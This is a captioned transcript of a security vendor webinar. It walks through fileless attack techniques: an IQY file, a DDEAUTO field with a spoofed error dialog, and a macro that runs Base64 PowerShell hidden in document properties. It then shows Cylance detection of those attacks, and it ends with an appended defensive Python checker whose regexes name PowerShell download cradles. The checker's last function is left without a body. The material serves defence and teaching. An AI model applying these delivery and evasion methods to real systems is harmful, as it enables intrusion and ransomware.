Webinar: Stopping Fileless Attacks with BlackBerry Cylance

Captions
Good morning, good afternoon, thank you everybody for joining our webinar today on fileless attacks and how to stop them. My name is Brian Robison, I'm the Chief Evangelist here at BlackBerry Cylance, and I would love to welcome you all to today's webinar. Let's go ahead and get started on content. I think today is gonna be kind of fun. I've got a couple of different things that we're gonna take a look at, and as always, if anybody has attended any of Stuart McClure's Hacking Exposed or any of my other webinars that I do, I spend as little time as possible in slides and spend most of the time looking at technology and doing things live on the screen. One word of warning, as always: we are messing with live attacks today. Things may happen on the screen that aren't planned or have not occurred during rehearsals or anything else, so please bear with us if we have any issues that happen.

All right, so let's just go ahead and move in. Today our agenda is pretty simple. We're gonna basically just have, I think, maybe two slides: what is a fileless attack and why do they matter, and then we're gonna jump in and actually do hands-on playtime. I think this is one of the reasons why a lot of you come to my webinars: I spend most of the time actually showing these techniques and how they work, rather than just a talking head lecturing to you about the importance of these attacks and what they are and things like that. So as always, I love to get my hands dirty and that's where we're gonna spend the majority of the time today. So once again, for those of you who just joined in, if you have questions please do enter those in the Q&A widget at the bottom of the screen. I will attempt to get to them as fast as possible. And yes, I do see the typo on the screen where I forgot my question mark, I'm sorry about that. Okay, so quick agenda, that's what we're gonna do today. It's gonna be very basic. Like I said, we're gonna spend just another minute or two here
in the slides and then we're gonna go play, because I think that's where we're gonna learn the most.

What are fileless attacks and why do we keep hearing about them in the news? What are they, how are they different from a traditional malware-based attack? Well, really simply, they kind of fall into four major categories: whether they're memory resident, script-based, they exploit resources, or they attack the system registry. But the main goal here with a fileless attack, different from a traditional kind of malware attack, is that the initial vector of the attack is not an executable file. It's not an EXE, it's not a DLL, it's usually a script, it's usually something that runs. It's designed to bypass a lot of the [inaudible] detection technologies that are out there initially. It also doesn't necessarily write files to disk, so it's not going to trigger a lot of the traditional detection methods, especially traditional AV, because it's looking for file writes and file reads and things like that. So those types of behaviors are kind of what define the world of the fileless attack. Again, they're used mainly in the initial phases of the attack, so at some point the attacker is going to have to execute code on your machine to do something, to take over a process or to do something. So sometimes that can happen in a script and sometimes it's gonna need some sort of executable or something like that, or their goal is to gain command and control and then to download some malware and ransomware the system or something like that. But that's the end phase. So the EXE that gets downloaded from their C2 and gets executed, that's usually at the very end after they've done all their recon and things like that. So at least in the initial phases of the attack there are not executable files being used. Now, that's not to say that these attacks don't ever come from a quote-unquote file. The most popular type of file that these attacks begin from is
actually a malicious document of some sort: PDF, Word doc, Excel, PowerPoint, whatever it is, it's usually a weaponized document. So to call it a completely fileless type of an attack is not really true. It starts from a file in most cases, but that file is simply not an executable file, which we can block with just about any basic technology, blacklisting, whitelisting, even stuff like that. Now, sometimes there are what we kind of see as zero-day exploit-based types of attacks, and these attacks are gonna attack potentially an exploit that is publicly facing, let's say. Right, so let's say you go back to cross-site scripting or SQL injection, right? A specially crafted string sent to a web server could cause an exploit to happen and then give that user some ability to access the system. But those types of attacks are somewhat rare, and generally, I mean, the vast majority of these quote-unquote fileless attacks traditionally start from a file, but it's usually a weaponized document and definitely not an executable or something that's going to cause your AV engine to scan.

Now, the other thing is, I also say that generally these are designed to live off the land. So the reason fileless attacks are successful and work is that there are a lot of very powerful tools on our workstations these days, and on our servers, that these attackers can use without having to put their own technology down on that box. So the less they have to put on that box, the chances of detection go down even more. So the less they have to change, or the less they have to bring down to the system and execute in memory, things like that, the less chance of attack detection. So they're going to try to use living-off-the-land techniques. They're gonna use PowerShell, they're gonna use certutil, they're gonna use tools that exist on the systems that are generally already trusted by the system, and that's essentially how these succeed. Okay, so very, very quickly we're gonna look at some statistics and basically try
to say, hey, why do these attacks matter? So in a recent survey, fifty-four percent of the companies surveyed experienced a compromise, and 77% of those who experienced a compromise basically resulted from use of a fileless technique. So rather than USB droppers with EXEs on them, or just emailing EXEs, which all of you know doesn't really work anymore, most of these people were actually attacked successfully with fileless techniques. So as a result, we're seeing the incidence of fileless attacks rising significantly over the past year or two. To me, and kind of a shameless plug here for Cylance, I think that a lot of this is due to essentially the effectiveness of tools like Cylance that can actually predict and prevent just files from being executed, and so we see the incidence of file-based attacks declining because of the effectiveness of tools like Cylance's pre-execution using machine learning that actually can prevent better than 99% of unknown files that are bad from executing. So yes, there are still hundreds and hundreds of thousands of samples of malware created on a daily basis, traditional executable malware. The problem is, with technology that exists today like Cylance, the effectiveness of those EXEs is a lot less, so obviously attackers are moving into different realms and one of those is fileless techniques.

Okay, a couple of notable examples, recent examples, and how we're gonna actually kind of tee up the demos we're gonna do today. We're mainly going to be looking at APT32 techniques today and we're gonna actually go through and reproduce some of these techniques. Now for any of those of you who have watched the Hacking Exposed webinars or got a chance to see us live at RSA this year, one of the things that I do with these attacks is, when we see them and we investigate them, we've been called into companies to stop a compromise or something like that or clean up after an incident, is we reverse engineer kind of those attacks and how they
got in and what the initial vectors were and things like that, and then I try to recreate those into tools that we can all use on a daily basis, not just for our own education but also to test the effectiveness of our tools and techniques to defend against those types of attacks. So the tools and techniques and things today that I'm gonna show you are based on the techniques of APT32, also called OceanLotus, and we're gonna take a look at a couple of different things. Pretty much they're all kind of script-based attacks, but there's different ways to launch them in which the code and the stuff that's running never actually gets saved out to disk. It always gets executed directly into memory, and that allows us to participate in kind of a non-detectable type of environment. So we're gonna take a look at using a couple of friends that I've used before. We're gonna look at IQY files and DDE, and I'll talk about DDE further when we get to that demo, and then on the third demo we're gonna actually go create and deliver a command and control infrastructure using a crafted malicious document based upon APT32 techniques. And the cool thing about that document is you can actually build it cross-platform; it can work on Mac and PC, so it's a lot of fun.

Okay, it is time to play, so let's just go ahead and jump right in. And again, questions, if you have them, please do enter them in the Q&A widget at the bottom of the screen and I will try to get to them throughout this demonstration. I've got a couple of victim systems and we want to start with our third victim system here. Okay, so our victim systems are just a standard Windows 10. These are 1809s, Enterprise Edition, and we've got some of these files sitting out here on the desktop. For example, you can see my cows chewing on a pallet, there's just some files sitting here, and the reason I have these files sitting out here is to basically simulate kind of a real-world desktop. You've got some work documents, you've got
some PDF documents on here, you've got all kinds of fun things, you've got Office installed, PDF documents, so this way we can kind of see, as some of these attacks are actually gonna deliver some malware and try to destroy the system again after we get a certain distance through the attack.

So the first example we're gonna take a look at is a file type called IQY. Now an IQY file, and again this is something that is, and it's still being used, but a lot of users are pretty darn familiar with things like how to work with attachments. They see XLS attachments or zip file attachments or things like that all the time. Now this interesting one that came out last year is called IQY, and so basically attached to the email is an IQY file. So we're gonna download this and then we're gonna open this in a folder. The reason this file is interesting is that it is a Microsoft Excel file, but it's an older file designed to query the web or a data service directly and pull data into the Excel file, and it hasn't really been used in a long time. So basically when APT32 began using this, a lot of the users in the world essentially weren't understanding what an IQY file was, so it looked kind of normal to them. Now the cool thing is, we'll open this with Notepad. If you statically examine this file, this is all that is in it. It's really kind of creepy in that, let's say you've got a gateway-based AV product or something, but instead of delivering the malware or the attack directly in the actual file coming through your gateway, this attack utilizes the ability to hide things and come through the gateway without really anything malicious in the file itself. So again, this is the only thing that's in this file. It basically is the URL that's gonna open up, and when Excel executes this thing it's gonna open up this URL and download this file. So the first thing we're gonna do, I'm gonna go show you what this file looks like. So what
this file that it's gonna download is, is actually a field that's going to enter and execute a command shell directly in Microsoft Excel, but it's gonna be a PowerShell command and it's gonna download essentially from the same site. It's then gonna go download this file called 1.dat. Now I've left this command in clear text so that you can kind of see what's happening here, but it's also very easy to do this with a base64-encoded command or something like that to obfuscate it, so that as it transits firewalls and scanners and next-gen tools that are looking at the content, it's very easy to hide this from view, and we're actually gonna take a look at some of those techniques in the third demo. So 1.dat, sorry, 2.dat is essentially going to come in and it's gonna download 1.dat. So 2.dat comes in first, then it downloads 1.dat. 1.dat is actually where the magic kind of happens. So basically we set a variable here, and this one is not necessarily a great example of fileless, but at least in the initial vector it's all completely quote-unquote fileless. So with this one it's gonna be very simple: we're just going to execute this PowerShell command that goes and downloads this file, and then this one executes and it's gonna simply download this EXE and execute it.

So let's go ahead and take a look at this one, how it works when it runs. I've always liked this one because of the fact that this IQY file, a lot of people don't really understand what this is, and it's not going to pop up the normal kind of yellow warning bar, the enable macros kind of thing, that a lot of our users have been trained on. So there are several different techniques, and in the three different demos today I'm going to show you three different Microsoft error messages that your users might not ever really recognize, and that's kind of the key of this attack as well. So you obviously do get a warning that pops up; the thing is, it's not really the traditional
warning that a user might expect. So if the social engineering is done well, where they basically say, "Hey, this is okay, you can click on this," or if they send it from a trusted source, I mean, how many people today click on Enable Macros even though they know they're not supposed to? So if you can trick up that situation a little bit, then you can actually get users to click on these things more often. So obviously data connections are disabled, but we're gonna go ahead and enable them. It's downloaded the first command and it's now actually going to execute the second command. So as you can see, this is really just kind of the entire Excel file, it's just in this one field, but you can see it went and grabbed this and it downloaded it. But again, there's nothing malicious even in this command that could be picked up; the actual magic happens when this file gets downloaded and executed in the background. So it's basically happened, and if we close Excel, yeah, it can't find the file anymore, because that bad-news-for-you file was actually WannaCry that got downloaded and encrypted this system. So this is a good example of delivering a very bad payload, aka WannaCry, with an initial vector that is completely fileless. There's no executable malware, all that good stuff we would normally be able to detect is simply not there. So WannaCry is gonna be busy doing its thing, but we're gonna put it out of its misery and we're gonna recycle this system back to the demo gods and let it reset.

So while that happens, we are going to flip into our second demo. Again, if there's any questions, folks, please do enter them in the Q&A. Okay, so the second example, we're actually going to, once again, our goal with fileless attacks is really to exploit the user, right? We're trying to get them to do something that they normally wouldn't do, and a lot of that is going to be around social engineering on a specific thing. So in this example, what we're gonna
do, we're gonna take this resume document sitting out here on the desktop and we're gonna open it. And this document actually does have a macro in it. We've used this document before in previous webinars, so you've probably seen this before, but what it does is, this gives you your standard end-user warning. However, we just click Enable Content, and in this document it's actually a legitimate macro that simply updates the fields in the document based upon your Active Directory login name. So this is an example of a good use of a macro, and is also an example of why you can't just simply disable macros in a lot of business environments that do use macros for legitimate purposes. We're gonna use this document a little bit in the next couple of demos, and this is gonna be fun.

But in this example we're gonna take a look at something called DDE, and that is basically an old Microsoft feature that still exists that allows you to dynamically link data into your documents from public sources. Now Microsoft did release a Microsoft Office fix that disabled DDE across all of the Office platforms. However, based upon feedback, because it just destroyed customers' data and their documents and everything else, they issued another patch which only disables it in Microsoft Word. So it's still active in Outlook, it's still active in Excel, it's still active in PowerPoint, etc. And then I have, in this system, actually turned it off again for Word, but that's just so that we can do this type of demo. So again, it's something that if you want to turn this off across your entire organization, you can't rely on the simple Microsoft patch; you're going to have to actually turn this off with registry keys that are deployed through Group Policy or something like that. So to use this one, this one's kind of fun, but again, the reason I like to show this one is because of what we can do with the actual error message. So what I want to do is I'm just gonna come down here and I'm gonna just
replace this, right here at the end of this sentence, this word "sentences". I'm gonna replace this and I'm gonna put in this field. We're just gonna put in an empty field. Now this field, we can delete the majority of this text here, and so basically if you look at this document now, they just have an exclamation point in here. However, if you hover over the exclamation point you'll see the very, very tiny gray field in there, and now we can toggle the field codes to actually get into the actual code that's in this field. Now I've created this already for us. This is kind of interesting; I love using this one because it's kind of a fun example of how this works. So the first thing we're gonna do is we're gonna put in the word DDEAUTO, and that's a keyword that allows us to execute this, and again we're simply going to execute a PowerShell command. But this time we're gonna actually go download a .ps1 script from our command and control server and execute it directly into memory. So we're not going to download the .ps1 file to disk and execute it; we're gonna execute it directly in memory. So what we're gonna use, and the part that's missing, is the ability to actually modify and change the error message that pops up on the screen. Now in most attacks you have to deal with Microsoft's error messages, but this one has a very specific way of invoking it. For example, we can put in some text up here at the front that makes it look more legit, a fake path. This is actually a fake path, but to the user it's gonna look legitimate. And then we have this word down here at the bottom called "blah", and we can simply replace this with "allowed by your security department". Okay, now the reason I'm going to do that is because this text is actually going to be popped up into the error message that is gonna come up from this document, and this is the scary part of this. So all we're gonna do is simply save the document and we're gonna reopen it, and you're gonna get these kind of warnings, right: "document contains
links that refer to other files." But this again is very common, so you click Yes, and in this case you see the remote data, and you can see the actual message that you typed in: "allowed by your security department is not accessible, do you want to start the application," and then you can see that fake path that I typed in. Now there's a certain amount of characters you can type here and a certain amount of things, but if you spend a little time with this and play with it, you can actually create a situation where you've created something that looks like an acceptable error message. So a specially crafted social-engineered email along with some specially crafted social-engineered Microsoft Word error dialogs again raise the chances of your victim potentially executing this file.

Now, so we've got our command and control sitting back here in the background and I'm gonna go ahead and start this up so you can kind of see what happens. First thing we need to do is we need a simple Python web server here. This is gonna serve up the initial .ps1 file for our malware to go download, or for our attack to go download, and then we're going to have our Python command and control here listening for a connection back. Okay, so if this attack runs, what you should see is it'll download the .ps1 file from here and then you'll see a callback and a successful connection back into the TrevorC2 command and control on this screen. Now the interesting thing is, and sometimes this works and sometimes this doesn't, but even if the user doesn't like this error message and they hit No, I've seen several times where this actually works and the command actually gets executed. So we're gonna try it anyway. So if the user hits No, and then they hit OK, they hit No and they hit OK... yeah, it didn't work this time, but I have seen this actually work. It's okay, so we're gonna close that and we'll reopen it. Sorry about that. Like I said, I've seen some times where even hitting No, it causes
that to actually happen. So we're gonna proceed. So we're gonna click Yes, and this time we're gonna hit Yes because, again, it's allowed by our security department. Did I screw things up? Oh no, it actually did work the first time, darn it. So it actually did work the first time when I hit No; I just had my scroll stopped on my SSH shell, so we didn't actually see it happen. I want to do that again so you can see that. I apologize, but this is kind of critical and I love seeing this actually happen. A good indicator for this one is that there probably is going to be PowerShell running in the background. Yeah, we actually have two shells because we actually successfully executed it. All right, and I'll say Yes to this field here, but we're gonna say, you know, I don't like this, I don't trust this, I want to ask somebody about it, and hit No. Okay, No, Okay. Is it gonna work? Maybe not. Did I screw it up again? No. Okay, I must have done something wrong, so we'll go back to the Yeses. I'm sorry guys, it must have been a Yes. Like I said, I have seen this work before where you do hit the No and it does actually connect, but we actually got it connected twice here. So we see it downloaded, we can interact with the session, we actually have a connection to our victim system here, and we can begin using our remote command and control to do things like taskkill /IM ... /F, so we can actually send and communicate with the endpoint. So this is a good example of being able to get past a lot of your user training with specially crafted error messages that our users are normally not going to ignore, and have a higher chance of getting in with that type of method.

Okay, so the third demo. This one I think you guys are gonna like; this one's a little bit fun. And the first thing we're gonna do is we're gonna open up some tools here to keep an eye on some things, so we're gonna need that, and let's see, I need to get back over here because I'm not gonna
want this Trevor anymore. All right, and actually we're gonna just recycle that one to the demo gods as well. Okay, so in this demo environment what we're gonna do is we're gonna basically kind of do the same thing. We're gonna SSH into our Kali box that has our Trevor client, get our simple web server set up here, and then we'll get our C2 set up. All right, so that's the basic setup. Now what we're gonna do, minimize those and get those out of the way. So again, we're gonna use our legitimate document that has a legitimate macro in it, but what we're gonna do is we're actually going to replace that macro. And, oh cool, we have some questions. I just popped back. Yes, yeah, I can put these files, make them available to you at the end of the webinar today. I'm gonna give you my direct email address and everything, so if you want these actual files, I have no problem sending them to you, including even this nasty VBScript that we're gonna just use here in a moment. So we'll have a little bit of fun with this, but this will allow you to test these things kind of in your own environment.

Okay, so this one's kind of fun to follow, so let's take a look at this. And again, we're going to enable the content, because it just uses a macro to update our username into our macro. So it's very simple, this is all it does, and again this is not a malicious macro in any way, shape, or form; it's just gonna update those fields. So let's say with this file that our users in our company are expecting this to have the enable macro warning, because it's general behavior for our environment. However, what we're gonna do with this one, this is where things get a little bit fun. I don't know, I have a real weird, sick sense of humor, I guess; I think playing with things like this is fun. We're gonna take this VBA code. Now this is some VBA code that is based upon APT32 techniques. I have modified it substantially so that it actually does work better on both platforms, but basically there's nothing
malicious in this VBA code that can be picked up from a macro scanning standpoint. Okay, it's difficult to determine if anything bad is gonna happen with this because there's nothing in here that is really detectable in being executed. But basically what we're gonna do here, you can see here this very simple if-else statement. What this does is it determines which platform it's running on. I showed this a little while ago, a few months ago I guess, where we actually use this also to take command and control of a Mac system, but this is a true cross-platform VB script, and so today we're gonna execute it on a PC. But what it's gonna do is it's gonna get the bad string from the Company name in the Properties field of the document, and it's gonna be a base64-encoded string, so it actually has its own base64 decoder built directly into the macro. Now this is one that we saw, again, APT32 using very successfully to attack targets in Asia, and so it makes life interesting. So what we're gonna do is we are simply going to save this document, because we're gonna now create our string. So again, in the actual document file itself there is actually nothing malicious. There's no PowerShell commands, there's not even a cmd.exe, there's nothing there.

So we're gonna use the same kind of PowerShell command we used before, and this is your standard, out-of-the-box PowerShell one-liner. This is like the most simple definition of a PowerShell one-liner command: you're gonna execute, you're gonna download this file, a .ps1, and you're gonna execute it in memory. Now the interesting thing is, and this is where we're gonna go a little wild today, I'm sorry that I did not practice this, so this may or may not work. So what we're gonna do is we're gonna go download this .ps1 by hand. All right, so we went to the web server and we downloaded the .ps1, so here's the .ps1 itself. Now if we actually just go to a command shell and,
like I said, this may or may not work, I hope it does. We should not be able to just simply execute the .ps1 from the command line because we don't really have... oops, I'm sorry, my brain is not working, it needs the path. We should not be able to do this because the default execution rights on a Windows system disable the ability to just execute any untrusted .ps1. So again, you simply just can't download the .ps1 and double-click on it and execute it because of the default execution rights. However, if you execute the PowerShell from Microsoft Word, for some reason the execution policy doesn't apply. So this again is a technique that the attackers are using. There's a bunch of different ways to bypass that very simple execution policy on a Windows system.

Now what we're gonna do, we're gonna obfuscate this command, because let's say we are using a public URL in here, and if we put it in the document in clear text, let's say an anti-spam gateway or something could see that URL and determine that it's a bad URL and then not allow it. That kind of stuff happens all the time. So all we're gonna do is use this tool called CyberChef, very cool tool by the way, plus you can download an offline version of it and keep it on your system. We're gonna simply convert this string, this PowerShell command, into a nice little base64-encoded string that doesn't really show up on any sort of scanner. Now we're gonna take the output, we're gonna copy that, and we don't even have to open our resume, we just are going to go into our Properties field and we can go into the Details, and again, for PC we paste the command into the Company field; if it's a Mac, we paste the command into the Comments field. So in fact, I actually have, this is the Python command here that you can run on a Mac to actually go download the Trevor client from the server. Now you have to put that command base64-encoded into this command here, which is called a wrapper, so that it
can, you put that base64-encoded code into here, and then you base64 encode this entire string into a bigger thing, and then you paste that into the Comments field of that document, and you'll have a Mac version that will actually execute the Python version of the Trevor client. So again, I don't have to open this document. This is weaponized right now; I could email it to somebody and they would be able to open it and actually have something very, very bad happen on their system. So in fact, because I have already saved this document with macros enabled, I think we're gonna probably execute this upon load, and it's actually going to yield a connection into our C2. So you can see here, we now have a connection into our C2. What we're going to do, we're actually going to stop that connection and we're gonna kill the PowerShell command running in memory, because I want to show you how this thing actually works. So it works: all I had to do was paste in that base64-encoded command and we got a command shell.

But I like showing this because this is the part where I get into the reverse engineering, and this is actually kind of fun to do. We're gonna view the Locals window, and this is gonna allow us to watch the variables as they get created. All right, so now we're gonna run Debug and we're gonna step into the VB. Okay, so you can see there the highlighted text in the top. We're gonna start stepping through the variables list here, sorry, Locals, we need Locals, not Watches, I'm sorry. Okay, so we come down here and we've actually got two variables created, found value and real string, right now they're empty. So when we execute this command it's gonna go pull the value from the document properties in the Company field. So think about all those different fields where you could put commands and things like that; you can actually use your VB script to pull those commands in and execute them at runtime only. So we're gonna continue stepping through, and so now you
basically, here at the bottom, you can see the base64-encoded string getting pulled into memory and stored in that variable. Okay, so next we're gonna go and actually do a base64 decoding. So it has its own little library in here. It's gonna just start kind of running through, so it pulls the string in and then it's gonna start running through this loop a hundred and seventy-three times. Now I'm just gonna run through the loop a few times. You can see it's just running through the loop and it's base64 encoding as it goes, and you can start seeing this variable here, which is "s out", so string out, and string out, as you can see here, is developing "pow..." as we go through here. Now I'm gonna hold down the key for a minute and you'll see it just kind of churn through and start decoding that string. See how that's working? It's just going through and it's continually decoding that string. Now that could take a very long time if it's a very long string, so what we're actually gonna do is we're gonna put a breakpoint right here on our VB script and then we're gonna hit one key to resume and let the computer finish decoding that string as fast as it can. So we're just gonna hit Run. Bang, okay, so there, that's how fast it completed, and you can see it's converted that base64-encoded string back to the actual PowerShell command. Okay, so now we're gonna step, we're gonna now take that value and we're gonna bring it back and put it into the real string that we're then going to execute on the Windows system. So then again we step, again we take that string down, and this is where we actually run this, and that completes the macro, and we should now have another Trevor connection down here on our screen. So once again, here we have a connection to a different victim system that is done with a malicious macro that is really highly obfuscated and is very easily bypassing the different detection techniques that are out there.

So the last thing I want to do is I want to just show how Cylance
does with this, and then we're gonna get to the questions; I see a few more have popped in. So we're gonna take our resume, we're gonna put it over here in our Dropbox. So the first thing we're going to take a look at is the IQY file, and we're gonna download this file just like we did on our victim system, and we're gonna bring it up. And just like on our victim system, this file, basically when you run it, it launched Microsoft Excel and you're gonna get your standard security warnings. So just like with our victim, we're gonna go ahead and enable that, and then we're gonna go ahead and execute, allow it to attempt to download, and very, very quickly what we see here is we get a Cylance OPTICS detection. But more importantly, we actually see Microsoft Excel closed in the background, and this is due to the active response capability that Cylance OPTICS has, in its ability to actually automatically respond and do something on your behalf instead of just kind of uploading the different bits of information to the console and letting you have to try to make the decision. Cylance OPTICS is preventative technology as well that allows you to actually set up a rule and respond immediately, taking action on that asset depending on what rules you have set. So let's pop over and actually look in the console at what OPTICS saw during the execution of the IQY file. So we start at our dashboard and we look at our Cylance OPTICS detections that have occurred, and you're gonna see a whole bunch of detections in here that are basically using the environment and detecting what's happening on the system. I mean, obviously there are multiple rules here that are being displayed. There is kind of this initial DDE rule that's displayed, we also get a machine-learning hit with a one-liner command, which is also basically the PowerShell download command, as well as the PowerShell malware kind of rule hits. So these two rules, the fileless PowerShell malware and the PowerShell
download are individual rules based upon the syntax of the commands trying to be attempted as an example the machine learning module is a newer module that a newer rule essentially that has been built into the system and it's basically built in machine learning so it's learned from millions and millions of different files file less PowerShell commands PowerShell download commands etc and we've actually built a world using machine learning to actually allow science optics to respond with a rule based in AI rather than rules that are based upon you know basically you know syntax pattern matching or text pattern matching like file show file US PowerShell malware rules so essentially the one-liner ml module rule can essentially replace these other individual rules but I have them all turned on right now so if we go in and we look at this we can see we'll look at the dde interpreter one first and so basically this is looking again at you know an office product essentially trying to launch powershell or command the XE or whatever and we do see for example here Microsoft Excel attempting to launch command exe and command exe you'll actually get to see the actual command that was trying to be downloaded using the iqy and remember that the iqy attempted to download the one dot DAT file so this detected this it stored the evidence here for you to review later but it also successfully terminated the process and then Microsoft Excel was also successfully terminated because we told the system to respond by terminating the process and essentially the process tree that was there based upon the detection we can look at the one-liner ml and again we have similar concept here we have Excel launching command exe again with this command the ml rule also saw this command being bad and unfortunately it failed to terminate the process because basically the process was already dead so the very first hit the dde rule hit actually terminated command exe and Excel exe so while this rule was 
configured basically to to also respond by terminating the process it was unable to because the process essentially was already gone so the PowerShell rule here as well this one did because we actually had command exe launched PowerShell because of this command here you can actually see this one because we're using the standard kind of new object web client download string pretty darn easy to tell that this is actually going out there and doing a PowerShell download so basically you can see here that the rule is built looking for very specific strings in the output again this one was able to kill the powershell exe process and basically the combination of all of these things happening in the background terminated that attack from actually succeeding so let's switch back to our endpoint system and then let's try the same thing with our resume now we've got our resume that's here on the desktop and this is the one basically the quote original one that we started off with with the enable macros yellow warning just like we always would get and if we hit enable content we properly get our fields updated just like we would expect to with this valid macro now let's go grab the the one that we put in our drop box and the drop box one replace the existing one is the one where we implemented that macro vbscript into this document that is actually now different and it's going to execute that code that we encoded into base 64 and put into the comments field so let's go ahead and launch this file and very quickly here again you're gonna see that script control is actually stepping in and stopping that macro from executing which is good it's exactly what it's supposed to do and and it's supposed to do that so there's one thing I would love to do really quickly here I would love to go and turn off so this is using a standard demo policy that's got all the stuff turned on what I actually want to do is I'm gonna go to this system and we're gonna put it into a policy group whereby 
script control is actually turned off so we're gonna turn off script control and we're gonna see what optics is able to see if we do actually allow these scripts to attempt to run so let's check for our policy update and we'll check our about box and make sure yep we've got our script control off policy so now script control is in a kind of audit only mode meaning it's going to potentially see the script run but it's not going to stop it so it's probably gonna just alert on it so let's try our resume again all right so in this case we actually saw the script attempt to run you can see down here in in the script control that it detected a malicious macro script but again it didn't block it as it did before and we actually allowed silence Optics to come in and do the actual detection and as you see here just like with Microsoft Excel Microsoft Word actually just closed because we've actually told it to kill all the processes associated with that with that stream of vents and thereby you know protecting the system from being compromised so once again we'll flip back to our console we'll come back in here and we'll get to see you know once again we've got you know quite a few hits here we've got the script interpreter trying to be launched from Microsoft Word and then of course we have the power shell or the one-liner command that came in and we can see that actual command that was attempt did we the computer gets to see it as non obfuscated base64 so you know it gets to actually see the attempt to run that so that evidence is captured for you not just the base64 string but the actual command that was attempted to be executed and again here you can see you know word launched PowerShell and by that behavior and that command that was being attempted those processes were successfully terminated and the system is not compromised so that's very quickly how basically silence protects silence optics all that silence technology on that endpoint is defending against those types 
of attacks file s as well as you know file based attacks but whether it's a obfuscated command or anything else like that it's very easy for silence to actually stop and prevent that type of event from from occurring so okay that's about it for seeing how silence does and if you have questions please do and enter them in a couple questions around how does silence you know scan files for example does it scan them as they're being received or whatever so silence protect as it scans you know executable type files has two capabilities it has what's called background threat detection and it has what's called file watcher so background threat detection is something that runs slow and slow in the background when you first install the product and it looks at every file and every process for malicious information if you find some it quarantines it file watcher is kind of what you were asking there chris is as you receive a file or put it on copy it over or whatever it queues it up for a scan in the background if you immediately attempted to execute the file before that file was scanned in the background if you attempt to execute it it will pick it up with pre execution so if you process like PS exec or something else attempts to execute it then you will it will be quote scanned by 5i silence now optics doesn't actually scan anything it it's it is our you know detect and prevent type product where it is detecting things that are happening real-time in memory as well as commands that are being issued and behavior of applications and things like that so it's it's EDR but its EDR with a prevention for strategy backing it so it's designed to stop the bad things from happening and then you get all of the good evidence that goes into into your console to be looked at and I I don't know what's going on with my demo rig today I apologize for that but for some reason those those it's not it's not functioning properly I will spend the rest of the day debugging that and figuring that 
out for our next webinar but if there are any more questions please feel free to enter them into the Q&A I'd be happy to answer them I would love to answer them for you I think we've covered most of the questions that are in there yeah so if the threat is not stopped by silence if it's not a pre execution threat or something like that the optics is an EDR so it is a flight data recorder it's going to record all of the things that happen so network connections file is created all that kind of stuff is is available to to be there to actually stop that and just really quickly what I can do is I can kind of show you what that looks like so if you look at the detection rules that are in here let's say you know we look at a bunch of minor ones for example so an office dde document we can monitor for it and then we can actually take a real real-time response not just upload it to the cloud or anything else like that wait for humans but we could actually take a proactive prevention technique and stop stop the processes so that's what I was doing here was I configure it to terminate the process any children processes that have happened and pop up a notification window we could also log off users we can dump the detection to the local disk and we can even then respond with an entire playbook of responses let's say we want to upload some commands we want to upload a script execute some commands gather some data and throw it off into a an amazon s3 bucket if you want for data collection for evidence collection all of that becomes available with with optics not just the flight data recording but actually the actual prevention of the attack and then based upon the evidence there so yes we have some what we call EDR only systems in the demo environment where we execute malware and watch what optics can see it's kind of fun to play that's a good playground so okay we are at the top of the hour and I do appreciate everybody hanging out with us today learning about how fireless 
attacks are created I did want to provide you here is my contact information feel free to take a screencap of that or you're going to get a copy of this deck as well so please feel free to reach out to me directly and I would be happy to send you those text files that have the PowerShell commands and things like that obviously there are some other back-end requirements that you're gonna need to set the you know the Kali server with with Trevor and all the other kind of stuff but be happy to help you guys set up your kind of own you know hacking exposed virus you know testing lab kind of stuff definitely like helping folks do that so please feel free to reach out to me and I will be available to help you and work through those thank you very very much I really appreciate it and take care and have a great day thank you so much
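Added example (not part of the webinar, and not BlackBerry Cylance code): the detection logic the presenter walks through in the OPTICS console, written out as a small Python checker over constructed process-creation events. It covers the three behaviours described above: an Office host (Word or Excel) launching cmd.exe or PowerShell, a PowerShell command line that carries the New-Object WebClient DownloadString cradle, and the case where that cradle is hidden behind -EncodedCommand, which the checker undoes (UTF-16LE Base64, as PowerShell itself expects) so the rule matches the real command and the evidence shows the de-obfuscated text. The event shape, the rule names, the file paths and the http://c2.example.invalid URL are assumptions chosen for the sample; they are not CylanceOPTICS rule ids or anything from the demo environment.

```python
import base64
import re
from dataclasses import dataclass
from typing import List, Optional

# Office hosts that have no business launching a script interpreter.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Interpreters whose launch from an Office parent mirrors the "DDE interpreter" style rule.
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Download-cradle fragments: the kind of very specific strings a PowerShell-download rule keys on.
CRADLE_PATTERNS = [re.compile(p, re.IGNORECASE) for p in (
    r"New-Object\s+(?:System\.)?Net\.WebClient",
    r"\.DownloadString\(",
    r"\.DownloadFile\(",
    r"Invoke-WebRequest",
)]


@dataclass(frozen=True)
class ProcessEvent:
    """One process-creation record (constructed shape; real sensors carry more fields)."""
    parent_image: str
    image: str
    command_line: str


@dataclass(frozen=True)
class Finding:
    rule: str    # hypothetical rule name, not a CylanceOPTICS rule id
    detail: str


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Recover the script behind -EncodedCommand (or any prefix of it: -e, -ec, -enc ...).

    PowerShell expects UTF-16LE text, Base64-encoded, so that is how it is undone here.
    Returns None when no such switch is present or the payload is not valid Base64.
    """
    tokens = command_line.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok[0] not in "-/":
            continue
        flag = tok[1:].lower()
        if not flag or not "encodedcommand".startswith(flag):
            continue
        try:
            return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            return None
    return None


def analyze(event: ProcessEvent) -> List[Finding]:
    """Apply the three checks to one event and return every rule that fires."""
    findings = []
    parent, image = basename(event.parent_image), basename(event.image)
    if parent in OFFICE_PARENTS and image in INTERPRETERS:
        findings.append(Finding("office_spawns_interpreter", f"{parent} launched {image}"))
    effective = event.command_line
    decoded = decode_encoded_command(event.command_line)
    if decoded is not None:
        # Keep the de-obfuscated command as evidence, then match the string rules against it.
        findings.append(Finding("encoded_command", decoded))
        effective = decoded
    hits = [p.pattern for p in CRADLE_PATTERNS if p.search(effective)]
    if hits:
        findings.append(Finding("powershell_download", "; ".join(hits)))
    return findings


def encode_for_sample(script: str) -> str:
    """Produce the UTF-16LE/Base64 form PowerShell accepts; used only to build sample input."""
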